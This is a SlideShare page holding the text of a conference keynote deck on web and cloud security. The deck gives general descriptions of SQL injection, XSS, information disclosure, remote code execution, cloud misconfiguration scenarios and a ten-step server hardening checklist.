Ce diaporama a bien été signalé.
Nous utilisons votre profil LinkedIn et vos données d’activité pour vous proposer des publicités personnalisées et pertinentes. Vous pouvez changer vos préférences de publicités à tout moment.
Web & Cloud Security
in the
Real World
Madhu Akula
@madhuakula
Madhu Akula - Profile
• Information Security Researcher
• Chapter Lead & Speaker null
• Acknowledged by US Department of
H...
This is for educational purpose only, I
am not responsible for any illegal
activities done by any one.
Let’s talk about
Social Engineering
My Experience !
Fake Emails
Demo
Data Breaches in Wild
http://www.idtheftcenter.org/ITRC-Surveys-
Sample Web Architecture
Web Security Statistics
http://www.imperva.com/docs/HII_Web_Application_Attack_Report_
Common Web Attacks
• Cross Site Scripting (XSS)
• SQL Injection
• Information Disclosure
• Remote Code Execution
Recent :
...
SQL Injection
• SQL Injection is one of the most used vectors
when malicious people want to create a new
botnet.
• SQL inj...
• SQL Injection Attack
• Number plate to foil an automatic license plate scanner !
• An attack which allows SQL to be exec...
Bobby Tables !
https://www.explainxkcd.com/wiki/index.php/327:_Exploits_of_a_Mom
Cross Site Scripting
• XSS flaw occurs whenever an application takes
untrusted data and sends it to a web browser
without ...
Example
• One of the most in-famous example is the MySpace
Samy worm. In less than a day he got more a million
friends and...
Information Disclosure
• Good security requires having a secure
configuration defined and deployed for the
applications, f...
Example
Network Solutions were offering
wordpress installation on a shared
server. The main configuration file wp-
config....
Remote Code Execution
An attacker's ability to execute any
commands of the attacker's choice on a
target machine or in a t...
Recent Popular Zero Days
• Java Deserialization Vulnerability
• Venom Vulnerability
• Beast Vulnerability
• Poodle Vulnera...
Demo
Let’s talk about Cloud
Threats Service Provider vs On-Premise
https://www.rackspace.com/knowledge_center/whitepaper/alert-logic-state-of-cloud-se...
App Insecurity Scenario
• App has Local File Inclusion bug
• The AWS root credentials are being used
• They are stored in ...
Infra Insecurity Scenario
• MySQL Production database is listening on external port
• Developers work directly on producti...
Heartbleed
https://xkcd.com/1354/
Data Insecurity Scenario
• Database is getting backed up regularly.
• Due to performance reasons, database wasn’t encrypte...
10 Steps for Cloud
• Enumerate all the network interfaces
• List all the running services
• Harden each service separately...
• Harden networking parameters of the kernel (Linux)
• Enable a host firewall
• Do an inventory all user accounts on the s...
Missuses of Cloud
(Recent Attacks)
http://thehackernews.c
om/
Resources
• null – null.co.in
• Security Tube – securitytube.net
• OWASP – owasp.org
• CSA – cloudsecurityalliance.org
• G...
My info while I answer your questions
Madhu Akula
Information Security Researcher
www.madhuakula.com
Twitter : @madhuakula...
Web & Cloud Security in the real world
Web & Cloud Security in the real world
Web & Cloud Security in the real world
Web & Cloud Security in the real world
Web & Cloud Security in the real world
Prochain SlideShare
Chargement dans…5
×

Web & Cloud Security in the real world

1 312 vues

Publié le

Presented as a keynote speaker at Dayananda Sagar College and event conducted by CompTIA.

Publié dans : Technologie
  • Identifiez-vous pour voir les commentaires

Web & Cloud Security in the real world

  1. 1. Web & Cloud Security in the Real World Madhu Akula @madhuakula
  2. 2. Madhu Akula - Profile • Information Security Researcher • Chapter Lead & Speaker null • Acknowledged by US Department of Homeland Security. • Found bugs in Google, Microsoft, Yahoo, Adobe … etc. • Open Source Contributor • Interested in Automation & DevOps • Never ending learner ! www.madhuakula.com
  3. 3. This is for educational purpose only, I am not responsible for any illegal activities done by any one.
  4. 4. Let’s talk about Social Engineering
  5. 5. My Experience !
  6. 6. Fake Emails
  7. 7. Demo
  8. 8. Data Breaches in Wild http://www.idtheftcenter.org/ITRC-Surveys-
  9. 9. Sample Web Architecture
  10. 10. Web Security Statistics http://www.imperva.com/docs/HII_Web_Application_Attack_Report_
  11. 11. Common Web Attacks • Cross Site Scripting (XSS) • SQL Injection • Information Disclosure • Remote Code Execution Recent : • Cross Site Port Attacks • Reflected File Download • Etc…
  12. 12. SQL Injection • SQL Injection is one of the most used vectors when malicious people want to create a new botnet. • SQL injection occurs when untrusted data is sent to an interpreter as part of a command • It causes attacker to take control over the database
  13. 13. • SQL Injection Attack • Number plate to foil an automatic license plate scanner ! • An attack which allows SQL to be executed as part of the input
  14. 14. Bobby Tables ! https://www.explainxkcd.com/wiki/index.php/327:_Exploits_of_a_Mom
  15. 15. Cross Site Scripting • XSS flaw occurs whenever an application takes untrusted data and sends it to a web browser without proper validation and escaping. • XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect user to malicious sites.
  16. 16. Example • One of the most in-famous example is the MySpace Samy worm. In less than a day he got more a million friends and MySpace had to be shutdown. • A XSS bug occurring on the website registration page can enable theft of registration details. • There are many exploitation frameworks for this vulnerability like BEEF, Xenotics, etc.
  17. 17. Information Disclosure • Good security requires having a secure configuration defined and deployed for the applications, frameworks, application server, web server, database server, and platform.
  18. 18. Example Network Solutions were offering wordpress installation on a shared server. The main configuration file wp- config.php was world readable. It causes Mass hack of wordpress based websites.
  19. 19. Remote Code Execution An attacker's ability to execute any commands of the attacker's choice on a target machine or in a target process.
  20. 20. Recent Popular Zero Days • Java Deserialization Vulnerability • Venom Vulnerability • Beast Vulnerability • Poodle Vulnerability • Heartbleed Vulnerability • Shell Shock Vulnerability • Etc SSL Related
  21. 21. Demo
  22. 22. Let’s talk about Cloud
  23. 23. Threats Service Provider vs On-Premise https://www.rackspace.com/knowledge_center/whitepaper/alert-logic-state-of-cloud-security-report-
  24. 24. App Insecurity Scenario • App has Local File Inclusion bug • The AWS root credentials are being used • They are stored in a world readable file on the server • Attacker reads the credentials and starts multiple large instances to mine bitcoins • Victim saddled with a massive bill at the end of the month http://www.slideshare.net/akashm/security-in-the-cloud-workshop-
  25. 25. Infra Insecurity Scenario • MySQL Production database is listening on external port • Developers work directly on production database and requires SQL Management Software • They log in using the root user of MySQL Database server and a simple password • Attacker runs a bruteforce script and cracks the password, gains full access to the database. http://www.slideshare.net/akashm/security-in-the-cloud-workshop-
  26. 26. Heartbleed https://xkcd.com/1354/
  27. 27. Data Insecurity Scenario • Database is getting backed up regularly. • Due to performance reasons, database wasn’t encrypted when initial backups were done. • Dev team moves to newer type SSDs and doesn’t decommission older HDDs. • Attacker finds older HDDs, does forensics for data recovery and sell the data for profit. http://www.slideshare.net/akashm/security-in-the-cloud-workshop-
  28. 28. 10 Steps for Cloud • Enumerate all the network interfaces • List all the running services • Harden each service separately based on best practices. • Secure remote access for server management(SSH, RDP) • Check operating system patch levels
  29. 29. • Harden networking parameters of the kernel (Linux) • Enable a host firewall • Do an inventory all user accounts on the server and audit them • Enable centralized logging • Enable encryption on disks, storage, etc.
  30. 30. Missuses of Cloud (Recent Attacks) http://thehackernews.c om/
  31. 31. Resources • null – null.co.in • Security Tube – securitytube.net • OWASP – owasp.org • CSA – cloudsecurityalliance.org • Google – Google.com
  32. 32. My info while I answer your questions Madhu Akula Information Security Researcher www.madhuakula.com Twitter : @madhuakula madhu.akula@hotmail.com | +91-9676865642

×